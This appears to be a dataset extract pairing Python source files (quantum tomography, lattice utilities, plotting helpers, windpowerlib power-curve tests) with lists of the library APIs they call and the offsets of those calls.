code
stringlengths
31
1.05M
apis
list
extract_api
stringlengths
97
1.91M
import itertools from typing import List, Tuple, Union import numpy as np from quara.objects.state import State from quara.objects.povm import Povm from quara.objects.qoperation import QOperation from quara.objects.qoperations import SetQOperations from quara.protocol.qtomography.standard.standard_qtomography import StandardQTomography from quara.qcircuit.experiment import Experiment from quara.utils.number_util import to_stream class StandardQst(StandardQTomography): _estimated_qoperation_type = State def __init__( self, povms: List[Povm], is_physicality_required: bool = False, is_estimation_object: bool = False, on_para_eq_constraint: bool = False, eps_proj_physical: float = None, eps_truncate_imaginary_part: float = None, seed_data: int = None, schedules: Union[str, List[List[Tuple]]] = "all", ): """Constructor Parameters ---------- povms : List[Povm] testers of QST. is_physicality_required : bool, optional whether the QOperation is physically required, by default False is_estimation_object : bool, optional whether the QOperation is estimation object, by default False on_para_eq_constraint : bool, optional whether the parameters of QOperation are on equal constraint, by default False eps_proj_physical : float, optional threshold epsilon where the algorithm repeats the projection in order to make estimate object is physical, by default :func:`~quara.settings.Settings.get_atol` / 10.0 eps_truncate_imaginary_part : float, optional threshold to truncate imaginary part, by default :func:`~quara.settings.Settings.get_atol` seed : int, optional a seed used to generate random data, by default None. Raises ------ ValueError the experiment is not valid. """ # create Experiment if type(schedules) == str: self._validate_schedules_str(schedules) if schedules == "all": schedules = [[("state", 0), ("povm", i)] for i in range(len(povms))] experiment = Experiment( states=[None], gates=[], povms=povms, schedules=schedules, seed_data=seed_data, ) self._validate_schedules(schedules) # create SetQOperations state = State( povms[0]._composite_system, np.zeros(povms[0].vecs[0].shape, dtype=np.float64), is_physicality_required=is_physicality_required, is_estimation_object=is_estimation_object, on_para_eq_constraint=on_para_eq_constraint, eps_proj_physical=eps_proj_physical, eps_truncate_imaginary_part=eps_truncate_imaginary_part, ) set_qoperations = SetQOperations(states=[state], gates=[], povms=[]) # initialize super class super().__init__(experiment, set_qoperations) # validate if not self.is_valid_experiment(): raise ValueError( "the experiment is not valid. all CompositeSystem of testers must have same ElementalSystems." ) # calc num_variables if on_para_eq_constraint: self._num_variables = state.dim ** 2 - 1 else: self._num_variables = state.dim ** 2 # create map self._map_experiment_to_setqoperations = {("state", 0): ("state", 0)} self._map_setqoperations_to_experiment = {("state", 0): ("state", 0)} # calc and set coeff0s, coeff1s, matA and vecB self._set_coeffs(experiment, on_para_eq_constraint, state.dim) self._on_para_eq_constraint = on_para_eq_constraint self._template_qoperation = self._set_qoperations.states[0] def _validate_schedules(self, schedules): for i, schedule in enumerate(schedules): if schedule[0][0] != "state" or schedule[1][0] != "povm": message = f"schedules[{i}] is invalid. " message += 'Schedule of Qst must be in format as \'[("state", 0), ("povm", povm_index)]\', ' message += f"not '{schedule}'." raise ValueError(message) if schedule[0][1] != 0: message = f"schedules[{i}] is invalid." message += f"State index of schedule in Qst must be 0: {schedule}" raise ValueError(message) @property def on_para_eq_constraint(self): # read only return self._on_para_eq_constraint def estimation_object_type(self) -> type: return State def _set_coeffs( self, experiment: Experiment, on_para_eq_constraint: bool, dim: int ): # coeff0s and coeff1s self._coeffs_0th = dict() self._coeffs_1st = dict() tmp_coeffs_0th = [] tmp_coeffs_1st = [] for schedule_index, schedule in enumerate(self._experiment.schedules): povm_index = schedule[-1][1] povm = self._experiment.povms[povm_index] for element_index, vec in enumerate(povm.vecs): if on_para_eq_constraint: self._coeffs_0th[(schedule_index, element_index)] = vec[ 0 ] / np.sqrt(dim) self._coeffs_1st[(schedule_index, element_index)] = vec[1:] tmp_coeffs_0th.append(vec[0]) tmp_coeffs_1st.append(vec[1:]) else: self._coeffs_0th[(schedule_index, element_index)] = 0 self._coeffs_1st[(schedule_index, element_index)] = vec tmp_coeffs_0th.append(0) tmp_coeffs_1st.append(vec) def is_valid_experiment(self) -> bool: """returns whether the experiment is valid. all of the following conditions are ``True``, the state is physically correct: - all povms have same CompositeSystem. Returns ------- bool whether the experiment is valid. """ is_ok_povms = self.is_all_same_composite_systems(self._experiment.povms) return is_ok_povms def _testers(self) -> List[Povm]: return self.experiment.povms def _get_target_index(self, experiment: Experiment, schedule_index: int) -> int: schedule = experiment.schedules[schedule_index] state_index = schedule[0][1] return state_index def generate_dataset(self, data_nums: List[int]) -> List[List[np.ndarray]]: """calculates a probability distribution. see :func:`~quara.protocol.qtomography.qtomography.QTomography.generate_dataset` """ raise NotImplementedError() def generate_empi_dist( self, schedule_index: int, state: State, num_sum: int, seed_or_generator: Union[int, np.random.Generator] = None, ) -> Tuple[int, np.ndarray]: """Generate empirical distribution using the data generated from probability distribution of specified schedules. Parameters ---------- schedule_index : int schedule index. state : State true object. num_sum : int the number of data to use to generate the experience distributions for each schedule. seed_or_generator : Union[int, np.random.Generator], optional If the type is int, it is assumed to be a seed used to generate random data. If the type is Generator, it is used to generate random data. If argument is None, np.random is used to generate random data. Default value is None. Returns ------- Tuple[int, np.ndarray] Generated empirical distribution. """ tmp_experiment = self._experiment.copy() state_index = self._get_target_index(tmp_experiment, schedule_index) tmp_experiment.states[state_index] = state stream = to_stream(seed_or_generator) empi_dist_seq = tmp_experiment.generate_empi_dist_sequence( schedule_index, [num_sum], seed_or_generator=stream ) return empi_dist_seq[0] def generate_empi_dists( self, state: State, num_sum: int, seed_or_generator: Union[int, np.random.Generator] = None, ) -> List[Tuple[int, np.ndarray]]: """Generate empirical distributions using the data generated from probability distributions of all schedules. see :func:`~quara.protocol.qtomography.qtomography.QTomography.generate_empi_dists` """ tmp_experiment = self._experiment.copy() for schedule_index in range(len(tmp_experiment.schedules)): state_index = self._get_target_index(tmp_experiment, schedule_index) tmp_experiment.states[state_index] = state num_sums = [num_sum] * self._num_schedules stream = to_stream(seed_or_generator) empi_dist_seq = tmp_experiment.generate_empi_dists_sequence( [num_sums], seed_or_generator=stream ) empi_dists = list(itertools.chain.from_iterable(empi_dist_seq)) return empi_dists def generate_empi_dists_sequence( self, state: State, num_sums: List[int], seed_or_generator: Union[int, np.random.Generator] = None, ) -> List[List[Tuple[int, np.ndarray]]]: """Generate sequence of empirical distributions using the data generated from probability distributions of all schedules. Parameters ---------- state : State true object. num_sums : List[int] list of the number of data to use to generate the experience distributions for each schedule. seed_or_generator : Union[int, np.random.Generator], optional If the type is int, it is assumed to be a seed used to generate random data. If the type is Generator, it is used to generate random data. If argument is None, np.random is used to generate random data. Default value is None. Returns ------- List[List[Tuple[int, np.ndarray]]] sequence of list of tuples for the number of data and experience distributions for each schedules. """ tmp_experiment = self._experiment.copy() list_num_sums = [num_sums] * self._num_schedules list_num_sums_tmp = [list(num_sums) for num_sums in zip(*list_num_sums)] for schedule_index in range(len(tmp_experiment.schedules)): state_index = self._get_target_index(tmp_experiment, schedule_index) tmp_experiment.states[state_index] = state stream = to_stream(seed_or_generator) empi_dists_sequence_tmp = tmp_experiment.generate_empi_dists_sequence( list_num_sums_tmp, seed_or_generator=stream ) empi_dists_sequence = [ list(empi_dists) for empi_dists in zip(*empi_dists_sequence_tmp) ] return empi_dists_sequence def convert_var_to_qoperation(self, var: np.ndarray) -> State: """converts variable to QOperation. see :func:`~quara.protocol.qtomography.standard.standard_qtomography.StandardQTomography.convert_var_to_qoperation` """ template = self._template_qoperation state = template.generate_from_var(var=var) return state def generate_empty_estimation_obj_with_setting_info(self) -> QOperation: """generates the empty estimation object with setting information. Returns ------- QOperation the empty estimation object(State) with setting information. """ empty_estimation_obj = self._set_qoperations.states[0] return empty_estimation_obj.copy() def num_outcomes(self, schedule_index: int) -> int: """returns the number of outcomes of probability distribution of a schedule index. Parameters ---------- schedule_index: int Returns ------- int the number of outcomes """ assert schedule_index >= 0 assert schedule_index < self.num_schedules povm_index = self._experiment.schedules[schedule_index][1][1] return len(self._experiment._povms[povm_index].vecs)
[ "numpy.zeros", "quara.utils.number_util.to_stream", "quara.qcircuit.experiment.Experiment", "itertools.chain.from_iterable", "quara.objects.qoperations.SetQOperations", "numpy.sqrt" ]
[((2227, 2321), 'quara.qcircuit.experiment.Experiment', 'Experiment', ([], {'states': '[None]', 'gates': '[]', 'povms': 'povms', 'schedules': 'schedules', 'seed_data': 'seed_data'}), '(states=[None], gates=[], povms=povms, schedules=schedules,\n seed_data=seed_data)\n', (2237, 2321), False, 'from quara.qcircuit.experiment import Experiment\n'), ((2921, 2971), 'quara.objects.qoperations.SetQOperations', 'SetQOperations', ([], {'states': '[state]', 'gates': '[]', 'povms': '[]'}), '(states=[state], gates=[], povms=[])\n', (2935, 2971), False, 'from quara.objects.qoperations import SetQOperations\n'), ((8084, 8112), 'quara.utils.number_util.to_stream', 'to_stream', (['seed_or_generator'], {}), '(seed_or_generator)\n', (8093, 8112), False, 'from quara.utils.number_util import to_stream\n'), ((9026, 9054), 'quara.utils.number_util.to_stream', 'to_stream', (['seed_or_generator'], {}), '(seed_or_generator)\n', (9035, 9054), False, 'from quara.utils.number_util import to_stream\n'), ((10803, 10831), 'quara.utils.number_util.to_stream', 'to_stream', (['seed_or_generator'], {}), '(seed_or_generator)\n', (10812, 10831), False, 'from quara.utils.number_util import to_stream\n'), ((2542, 2592), 'numpy.zeros', 'np.zeros', (['povms[0].vecs[0].shape'], {'dtype': 'np.float64'}), '(povms[0].vecs[0].shape, dtype=np.float64)\n', (2550, 2592), True, 'import numpy as np\n'), ((9210, 9254), 'itertools.chain.from_iterable', 'itertools.chain.from_iterable', (['empi_dist_seq'], {}), '(empi_dist_seq)\n', (9239, 9254), False, 'import itertools\n'), ((5370, 5382), 'numpy.sqrt', 'np.sqrt', (['dim'], {}), '(dim)\n', (5377, 5382), True, 'import numpy as np\n')]
import numpy as np from sys import platform import os def get_slash(): if platform == 'win32': return '\\' else: return '/' def kpoint_segment(first, second, pps): """ :param first: first k-point :param second: second k-point :param pps: points per segment :return: normalized (by k-space distance) segment for bands plot """ first = np.array(first) second = np.array(second) dist = np.linalg.norm(second - first) segment = np.linspace(0, dist, pps) return segment def frac2cart(frac_point, lat, twopi=False): """ transforms a fractional point to cartesian. assumes that the lattice already has 2pi included :param frac_point: fractional coordiante :param lat: lattice. can be either real space or reciprocal space. should be a matrix where each row is a lattice vector :param twopi: determines weather a multiplication by 2pi is needed :return: cartesian point """ frac_point = np.array(frac_point) lat = np.array(lat) for i in range(3): lat[i] *= frac_point[i] if twopi: cart = 2 * np.pi * lat.sum(0) else: cart = lat.sum(0) return cart.tolist() def smooth(vec, step): vec2 = np.zeros(len(vec)) for i in range(step - 1, len(vec), step): vec2[i - (step - 1):i + 1] = vec[i - (step - 1):i + 1].sum() / step return vec2 def cart2frac(coordinates, lattice): lattice = np.array(lattice) coordinates = np.array(coordinates) if coordinates.shape == (3,): return np.linalg.solve(lattice.T, coordinates).tolist() else: fracs = np.zeros(len(coordinates) * 3).reshape(len(coordinates), 3) for i, coordinate in enumerate(coordinates): fracs[i] = np.linalg.solve(lattice.T, coordinate) return fracs.tolist() def gauge_fix(vec): """ fixes the gauge of a vector or a list of vectors (returns a numpy array) """ vec = np.array(vec, dtype=complex) if type(vec[0]) == np.ndarray: for i in range(len(vec)): vec[i] = vec[i] * np.exp(-1j * np.angle(vec[i].sum())) if vec[i].sum() < 0: vec[i] = -vec[i] else: vec = vec * np.exp(-1j * np.angle(vec.sum())) if vec.sum() < 0: vec = -vec return vec def ints2vec(unit_cell, integers): """ :param unit_cell: :param integers: list of 3 integers [n1, n2, n3] such that R = n1a1 + n2a2 + n3a3 :return: a lattice vector as a numpy array """ unit_cell = np.array(unit_cell) integers = np.array(integers) r = np.zeros(3) for i in range(3): r += integers[i] * unit_cell[i] return np.array(r)
[ "numpy.zeros", "numpy.linalg.norm", "numpy.array", "numpy.linspace", "numpy.linalg.solve" ]
[((390, 405), 'numpy.array', 'np.array', (['first'], {}), '(first)\n', (398, 405), True, 'import numpy as np\n'), ((419, 435), 'numpy.array', 'np.array', (['second'], {}), '(second)\n', (427, 435), True, 'import numpy as np\n'), ((447, 477), 'numpy.linalg.norm', 'np.linalg.norm', (['(second - first)'], {}), '(second - first)\n', (461, 477), True, 'import numpy as np\n'), ((492, 517), 'numpy.linspace', 'np.linspace', (['(0)', 'dist', 'pps'], {}), '(0, dist, pps)\n', (503, 517), True, 'import numpy as np\n'), ((989, 1009), 'numpy.array', 'np.array', (['frac_point'], {}), '(frac_point)\n', (997, 1009), True, 'import numpy as np\n'), ((1020, 1033), 'numpy.array', 'np.array', (['lat'], {}), '(lat)\n', (1028, 1033), True, 'import numpy as np\n'), ((1447, 1464), 'numpy.array', 'np.array', (['lattice'], {}), '(lattice)\n', (1455, 1464), True, 'import numpy as np\n'), ((1483, 1504), 'numpy.array', 'np.array', (['coordinates'], {}), '(coordinates)\n', (1491, 1504), True, 'import numpy as np\n'), ((1954, 1982), 'numpy.array', 'np.array', (['vec'], {'dtype': 'complex'}), '(vec, dtype=complex)\n', (1962, 1982), True, 'import numpy as np\n'), ((2537, 2556), 'numpy.array', 'np.array', (['unit_cell'], {}), '(unit_cell)\n', (2545, 2556), True, 'import numpy as np\n'), ((2572, 2590), 'numpy.array', 'np.array', (['integers'], {}), '(integers)\n', (2580, 2590), True, 'import numpy as np\n'), ((2599, 2610), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (2607, 2610), True, 'import numpy as np\n'), ((2685, 2696), 'numpy.array', 'np.array', (['r'], {}), '(r)\n', (2693, 2696), True, 'import numpy as np\n'), ((1765, 1803), 'numpy.linalg.solve', 'np.linalg.solve', (['lattice.T', 'coordinate'], {}), '(lattice.T, coordinate)\n', (1780, 1803), True, 'import numpy as np\n'), ((1554, 1593), 'numpy.linalg.solve', 'np.linalg.solve', (['lattice.T', 'coordinates'], {}), '(lattice.T, coordinates)\n', (1569, 1593), True, 'import numpy as np\n')]
import numpy as np from pyglib.model import circauxi import shutil,subprocess cmd = ['/home/ykent/WIEN_GUTZ/bin2/CyGutz', '-r', '-1'] for i,u in enumerate(np.arange(1.0,0.9,-10)): print(' Running with u = {}'.format(u)) circauxi.gutz_model_setup(u=u, nmesh=5000, norb=3, tiny=0.0, mu=0.0) subprocess.call(cmd) shutil.copyfile('WH_RL_BEST.h5', 'WH_RL_INIT.h5') shutil.copyfile('WH_RL_BEST.h5', 'WH_RL_INIT.h5_{}'.format(u))
[ "pyglib.model.circauxi.gutz_model_setup", "shutil.copyfile", "subprocess.call", "numpy.arange" ]
[((157, 181), 'numpy.arange', 'np.arange', (['(1.0)', '(0.9)', '(-10)'], {}), '(1.0, 0.9, -10)\n', (166, 181), True, 'import numpy as np\n'), ((230, 298), 'pyglib.model.circauxi.gutz_model_setup', 'circauxi.gutz_model_setup', ([], {'u': 'u', 'nmesh': '(5000)', 'norb': '(3)', 'tiny': '(0.0)', 'mu': '(0.0)'}), '(u=u, nmesh=5000, norb=3, tiny=0.0, mu=0.0)\n', (255, 298), False, 'from pyglib.model import circauxi\n'), ((303, 323), 'subprocess.call', 'subprocess.call', (['cmd'], {}), '(cmd)\n', (318, 323), False, 'import shutil, subprocess\n'), ((328, 377), 'shutil.copyfile', 'shutil.copyfile', (['"""WH_RL_BEST.h5"""', '"""WH_RL_INIT.h5"""'], {}), "('WH_RL_BEST.h5', 'WH_RL_INIT.h5')\n", (343, 377), False, 'import shutil, subprocess\n')]
# coding:utf-8 from bokeh.charts import TimeSeries, show, output_file import numpy as np import pandas as pd import matplotlib.pyplot as plt import matplotlib import json from itertools import cycle ## 在这里设置好字体等因素 from pylab import mpl mpl.rcParams['font.sans-serif'] = ['Adobe Heiti Std'] # 指定默认字体 mpl.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题 mpl.rcParams['savefig.dpi'] = 300 class Visualizer : def __init__(self, pandas=[]) : self.pandas = pandas def scale_axis(self, tuple_range, scale) : middle = (tuple_range[0] + tuple_range[1]) / 2.0 return (middle + scale* (i - middle) for i in tuple_range) def data_middle(self, tuple_range, *args, **kwargs) : a = max(tuple_range) return (-0.1*a, 1.2*a) def show_3_variables(self, var_list) : #self.pandas.plot(x=self.pandas.time); """ 依次是红绿蓝的样式,使用各自的配色。其中第三个主要是参考线 观察前两个随着时间的变化的关系。 """ slices = self.pandas[var_list] fig, ax1 = plt.subplots() ax2, ax3 = ax1.twinx(), ax1.twinx() ax1.set_xlabel("simulation time") ax1.set_ylabel(var_list[0]) ax2.set_ylabel(var_list[1]) ax3.set_ylabel(var_list[2]) rspine = ax3.spines['right'] rspine.set_position(('axes', 1.20)) ax3.set_frame_on(True) ax3.patch.set_visible(False) fig.subplots_adjust(right=0.75) ## 注意在画legend的时候的特殊技巧 styles = ['r-', 'g-', 'b--'] ax1.plot(slices[var_list[0]], styles[0],label=var_list[0]) ax1.plot(0,0, styles[1],label=var_list[1]) ax1.plot(0,0, styles[2],label=var_list[2]) ## 注意坐标轴$(min,max)$的放缩变换是$(min+max)/2 + k*(x - (min+max)/2) print(ax2.get_ylim()) ax2.plot(slices[var_list[1]], styles[1],label=var_list[1]) ax2.set_ylim( self.scale_axis(ax2.get_ylim(),1.2) ) ax3.plot(slices[var_list[2]], styles[2],label=var_list[2]) ax3.set_ylim( self.scale_axis(ax3.get_ylim(),1.4) ) #slices[var_list[1]].plot(ax=ax2, style='r-',label=var_list[0], secondary_y=True) #slices[var_list[2]].plot(ax=ax3, style='g-',label=var_list[0]) ax1.legend(loc='upper left') ## lower/upper/center left/right #plt.legend(loc='best') plt.show() # d = Pandas Dataframe, # ys = [ [cols in the same y], [cols in the same y], [cols in the same y], .. ] # any different y axis <http://stackoverflow.com/questions/7733693/matplotlib-overlay-plots-with-different-scales> def show_n_vars_on_right(self, var_list_group , line_styles = cycle(['-','-','-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_']) , markers = cycle(['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p', 'P', '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_']) ) : d = self.pandas ys = var_list_group #from itertools import cycle fig, ax = plt.subplots() axes = [ax] for y in ys[1:]: # Twin the x-axis twice to make independent y-axes. axes.append(ax.twinx()) extra_ys = len(axes[2:]) # Make some space on the right side for the extra y-axes. if extra_ys>0: temp = 0.85 if extra_ys<=2: temp = 0.75 elif extra_ys<=4: temp = 0.6 if extra_ys>5: raise Exception('you are being ridiculous, too more axes') fig.subplots_adjust(right=temp) right_additive = (0.98-temp)/float(extra_ys) # Move the last y-axis spine over to the right by x% of the width of the axes i = 1. for ax in axes[2:]: ax.spines['right'].set_position(('axes', 1.+right_additive*i)) ax.set_frame_on(True) ax.patch.set_visible(False) ax.yaxis.set_major_formatter(matplotlib.ticker.OldScalarFormatter()) i +=1. # To make the border of the right-most axis visible, we need to turn the frame # on. This hides the other plots, however, so we need to turn its fill off. cols = [] lines = [] #line_styles = cycle(['-','-','-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>', # '1', '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_']) #markers = cycle(['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p', 'P', '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_']) colors = cycle(matplotlib.rcParams['axes.color_cycle']) for ax,y in zip(axes,ys): ls=next(line_styles) ms=next(markers) if len(y)==1: col = y[0] cols.append(col) color = next(colors) lines.append(ax.plot(d[col],linestyle =ls, marker=ms, label = col,color=color)) ax.set_ylabel(col,color=color) #ax.tick_params(axis='y', colors=color) ax.spines['right'].set_color(color) ax.set_ylim( self.data_middle(ax.get_ylim(), 1.2+0.5*np.random.random()) ) else: for col in y: color = next(colors) lines.append(ax.plot(d[col],linestyle =ls,marker=ms, label = col,color=color)) cols.append(col) ax.set_ylabel(', '.join(y)) ax.set_ylim( self.data_middle(ax.get_ylim(), 1.2+0.5*np.random.random()) ) #ax.tick_params(axis='y') axes[0].set_xlabel(d.index.name) lns = lines[0] for l in lines[1:]: lns +=l labs = [l.get_label() for l in lns] axes[0].legend(lns, labs, loc="upper left") #axes[0].set_xlabel("simulation time") #for i in range(0,len(ys[0])) : axes[0].set_xlabel("simulation time") plt.show() def show_n_var_on_left (self, var_list) : # Twin the x-axis twice to make independent y-axes. axes = [ax, ax.twinx(), ax.twinx()] # Make some space on the right side for the extra y-axis. fig.subplots_adjust(right=0.75) # Move the last y-axis spine over to the right by 20% of the width of the axes axes[1].spines['right'].set_position(('axes', -0.25)) axes[2].spines['right'].set_position(('axes', -0.5)) # To make the border of the right-most axis visible, we need to turn the frame # on. This hides the other plots, however, so we need to turn its fill off. axes[-1].set_frame_on(True) axes[-1].patch.set_visible(False) # And finally we get to plot things... colors = ('Green', 'Red', 'Blue') intAxNo = 0 for ax, color in zip(axes, colors): intAxNo += 1 data = np.random.random(1) * np.random.random(10) ax.plot(data, marker='o', linestyle='none', color=color) if (intAxNo > 1): if (intAxNo == 2): ax.set_ylabel('%s Thing' % color, color=color, labelpad = -40 ) elif (intAxNo == 3): ax.set_ylabel('%s Thing' % color, color=color, labelpad = -45 ) ax.get_yaxis().set_tick_params(direction='out') else: ax.set_ylabel('%s Thing' % color, color=color, labelpad = +0 ) ax.tick_params(axis='y', colors=color) axes[0].set_xlabel('X-axis') plt.show() def bokeh_show(self) : df= pd.DataFrame(self.pandas) df.consumer_payments = df.consumer_payments.cumsum() df.cost_for_consumer = df.cost_for_consumer.cumsum() df.plot(x=df.start_time); #df.to_csv(open("data.csv", 'w')) obvalues = pd.DataFrame(dict(r_q=df['r_q'],pay=df['consumer_payments'],sf_q=df['sf_q'])) #p = TimeSeries(obvalues, legend=True, title="Stocks", ylabel='Stock Prices') show(p) def merged_show(self) : a = [] df= pd.DataFrame(self.pandas) df.benefit= df.benefit.cumsum() df.cost_for_customer = df.cost_for_customer.cumsum() a.append(df.benefit) #df = pd.DataFrame(a) #print(a) df = pd.concat(a, axis=1) #print(df) df.plot() plt.legend(loc='best') plt.show()
[ "pandas.DataFrame", "matplotlib.pyplot.show", "matplotlib.pyplot.legend", "bokeh.charts.show", "numpy.random.random", "matplotlib.ticker.OldScalarFormatter", "itertools.cycle", "matplotlib.pyplot.subplots", "pandas.concat" ]
[((1024, 1038), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (1036, 1038), True, 'import matplotlib.pyplot as plt\n'), ((2288, 2298), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2296, 2298), True, 'import matplotlib.pyplot as plt\n'), ((2611, 2764), 'itertools.cycle', 'cycle', (["['-', '-', '-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>', '1',\n '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_']"], {}), "(['-', '-', '-', '-.', '-.', ':', '.', ',', 'o', 'v', '^', '<', '>',\n '1', '2', '3', '4', 's', 'p', '*', 'h', 'H', '+', 'x', 'D', 'd', '|', '_'])\n", (2616, 2764), False, 'from itertools import cycle\n'), ((2802, 2938), 'itertools.cycle', 'cycle', (["['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p', 'P',\n '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_']"], {}), "(['.', ',', 'o', 'v', '^', '<', '>', '1', '2', '3', '4', '8', 's', 'p',\n 'P', '*', 'h', 'H', '+', 'x', 'X', 'D', 'd', '|', '_'])\n", (2807, 2938), False, 'from itertools import cycle\n'), ((3059, 3073), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3071, 3073), True, 'import matplotlib.pyplot as plt\n'), ((4632, 4678), 'itertools.cycle', 'cycle', (["matplotlib.rcParams['axes.color_cycle']"], {}), "(matplotlib.rcParams['axes.color_cycle'])\n", (4637, 4678), False, 'from itertools import cycle\n'), ((5993, 6003), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6001, 6003), True, 'import matplotlib.pyplot as plt\n'), ((7624, 7634), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7632, 7634), True, 'import matplotlib.pyplot as plt\n'), ((7677, 7702), 'pandas.DataFrame', 'pd.DataFrame', (['self.pandas'], {}), '(self.pandas)\n', (7689, 7702), True, 'import pandas as pd\n'), ((8094, 8101), 'bokeh.charts.show', 'show', (['p'], {}), '(p)\n', (8098, 8101), False, 'from bokeh.charts import TimeSeries, show, output_file\n'), ((8161, 8186), 'pandas.DataFrame', 'pd.DataFrame', (['self.pandas'], {}), '(self.pandas)\n', (8173, 8186), True, 'import pandas as pd\n'), ((8378, 8398), 'pandas.concat', 'pd.concat', (['a'], {'axis': '(1)'}), '(a, axis=1)\n', (8387, 8398), True, 'import pandas as pd\n'), ((8444, 8466), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (8454, 8466), True, 'import matplotlib.pyplot as plt\n'), ((8475, 8485), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8483, 8485), True, 'import matplotlib.pyplot as plt\n'), ((4004, 4042), 'matplotlib.ticker.OldScalarFormatter', 'matplotlib.ticker.OldScalarFormatter', ([], {}), '()\n', (4040, 4042), False, 'import matplotlib\n'), ((6958, 6977), 'numpy.random.random', 'np.random.random', (['(1)'], {}), '(1)\n', (6974, 6977), True, 'import numpy as np\n'), ((6980, 7000), 'numpy.random.random', 'np.random.random', (['(10)'], {}), '(10)\n', (6996, 7000), True, 'import numpy as np\n'), ((5218, 5236), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (5234, 5236), True, 'import numpy as np\n'), ((5578, 5596), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (5594, 5596), True, 'import numpy as np\n')]
""" SPDX-FileCopyrightText: 2019 oemof developer group <<EMAIL>> SPDX-License-Identifier: MIT """ import pandas as pd import numpy as np import pytest from pandas.util.testing import assert_frame_equal from windpowerlib.power_curves import (smooth_power_curve, wake_losses_to_power_curve) import windpowerlib.wind_turbine as wt class TestPowerCurves: @classmethod def setup_class(self): self.test_turbine = {'hub_height': 100, 'turbine_type': 'E-126/4200'} def test_smooth_power_curve(self): test_curve = wt.WindTurbine(**self.test_turbine).power_curve parameters = {'power_curve_wind_speeds': test_curve['wind_speed'], 'power_curve_values': test_curve['value'], 'standard_deviation_method': 'turbulence_intensity'} # Raise ValueError - `turbulence_intensity` missing with pytest.raises(ValueError): parameters['standard_deviation_method'] = 'turbulence_intensity' smooth_power_curve(**parameters) # Test turbulence_intensity method parameters['turbulence_intensity'] = 0.5 wind_speed_values_exp = pd.Series([6.0, 7.0, 8.0, 9.0, 10.0], name='wind_speed') power_values_exp = pd.Series([ 1141906.9806766496, 1577536.8085282773, 1975480.993355767, 2314059.4022704284, 2590216.6802602503], name='value') smoothed_curve_exp = pd.DataFrame(data=pd.concat([ wind_speed_values_exp, power_values_exp], axis=1)) smoothed_curve_exp.index = np.arange(5, 10, 1) assert_frame_equal(smooth_power_curve(**parameters)[5:10], smoothed_curve_exp) # Test Staffel_Pfenninger method parameters['standard_deviation_method'] = 'Staffell_Pfenninger' power_values_exp = pd.Series([ 929405.1348918702, 1395532.5468724659, 1904826.6851982325, 2402659.118305521, 2844527.1732449625], name='value') smoothed_curve_exp = pd.DataFrame( data=pd.concat([wind_speed_values_exp, power_values_exp], axis=1)) smoothed_curve_exp.index = np.arange(5, 10, 1) assert_frame_equal(smooth_power_curve(**parameters)[5:10], smoothed_curve_exp) # Raise ValueError - misspelling with pytest.raises(ValueError): parameters['standard_deviation_method'] = 'misspelled' smooth_power_curve(**parameters) def test_wake_losses_to_power_curve(self): test_curve = wt.WindTurbine(**self.test_turbine).power_curve parameters = {'power_curve_wind_speeds': test_curve['wind_speed'], 'power_curve_values': test_curve['value'], 'wind_farm_efficiency': 0.9} # Test constant efficiency power_curve_exp = test_curve.copy(deep=True) power_curve_exp['value'] = power_curve_exp['value'].values * 0.9 assert_frame_equal(wake_losses_to_power_curve(**parameters), power_curve_exp) # Test efficiency curve parameters['wind_farm_efficiency'] = pd.DataFrame( pd.concat([pd.Series(np.arange(1, 26, 1)), pd.Series([ 1.0, 1.0, 1.0, 0.84, 0.85, 0.86, 0.85, 0.85, 0.85, 0.86, 0.87, 0.89, 0.92, 0.95, 0.95, 0.96, 0.99, 0.95, 0.98, 0.97, 0.99, 1.0, 1.0, 1.0, 1.0])], axis=1)) parameters['wind_farm_efficiency'].columns = ['wind_speed', 'efficiency'] power_curve_exp = test_curve.copy(deep=True) power_curve_exp['value'] = ( power_curve_exp['value'].values * parameters[ 'wind_farm_efficiency']['efficiency']) assert_frame_equal(wake_losses_to_power_curve(**parameters), power_curve_exp) # Raise TypeError if wind farm efficiency is of wrong type with pytest.raises(TypeError): parameters['wind_farm_efficiency'] = 1 wake_losses_to_power_curve(**parameters) if __name__ == "__main__": test = TestPowerCurves() test.setup_class() test.test_smooth_power_curve() test.test_wake_losses_to_power_curve()
[ "windpowerlib.power_curves.smooth_power_curve", "windpowerlib.wind_turbine.WindTurbine", "windpowerlib.power_curves.wake_losses_to_power_curve", "pytest.raises", "numpy.arange", "pandas.Series", "pandas.concat" ]
